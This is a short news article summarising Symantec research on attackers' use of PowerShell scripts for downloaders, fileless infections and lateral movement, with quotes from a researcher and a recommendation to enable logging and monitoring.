PowerShell scripts used to attack businesses
While many system administrators use PowerShell scripts for daily management tasks, researchers have seen attackers increasingly using the framework for their campaigns.
Many recent targeted attacks have used PowerShell scripts, according to Symantec. “The Odinaff group used malicious PowerShell scripts when it attacked financial organisations worldwide,” said Wueest.
“Common cyber criminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry,” he said.
Malicious PowerShell scripts are mainly used as downloaders, said Wueest, such as Office macros, and during the lateral movement phase, where a threat executes code on a remote computer when spreading inside the network.
“Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections,” he said.
Apart from downloading payloads, malicious PowerShell scripts have been used to perform various tasks, such as uninstalling security products, detecting sandboxed environments or sniffing the network for passwords.
The flexibility of the PowerShell language allows scripts to be obfuscated in multiple ways, such as command shortcuts, escape characters or encoding functions, the researchers have found.
Symantec expects more PowerShell threats to appear in the future. “We strongly recommend system administrators to upgrade to the latest version of PowerShell and enable extended logging and monitoring capabilities,” said Wueest.